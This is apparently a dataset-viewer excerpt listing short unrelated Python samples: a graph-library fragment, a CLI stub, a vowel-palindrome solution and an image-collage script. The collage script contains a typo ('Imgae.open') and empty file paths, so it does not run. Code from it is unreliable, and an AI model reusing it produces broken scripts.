node.addRelationshipProperty(adjacentName, RelationshipProperty.MICROTOSCA_RELATIONSHIPS_INTERACT_WITH_DYNAMIC_DISCOVERY_PROPERTY)
break
|
nilq/baby-python
|
python
|
import __init__
from rider.utils.commands import main
main()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# Paulo Cezar, Maratona 2016, huaauhahhuahau
s = ''.join(c for c in input() if c in "aeiou")
print("S" if s == s[::-1] else "N")
|
nilq/baby-python
|
python
|
#import PIL and numpy
from PIL import Image
import numpy as np
#open images by providing path of images
img1 = Image.open("")
img2 = Imgae.open("")
#create arrays of above images
img1_array = np.array(img1)
img2_array = np.array(img2)
# collage of 2 images
#arrange arrays of two images in a single row
imgg = np.hstack([img1_array,img2_array])
#create image of imgg array
final_img = Image.fromarray(imgg)
#provide the path with name for finalizing where you want to save it
final_img.save("")
print("Image saved")
|
nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.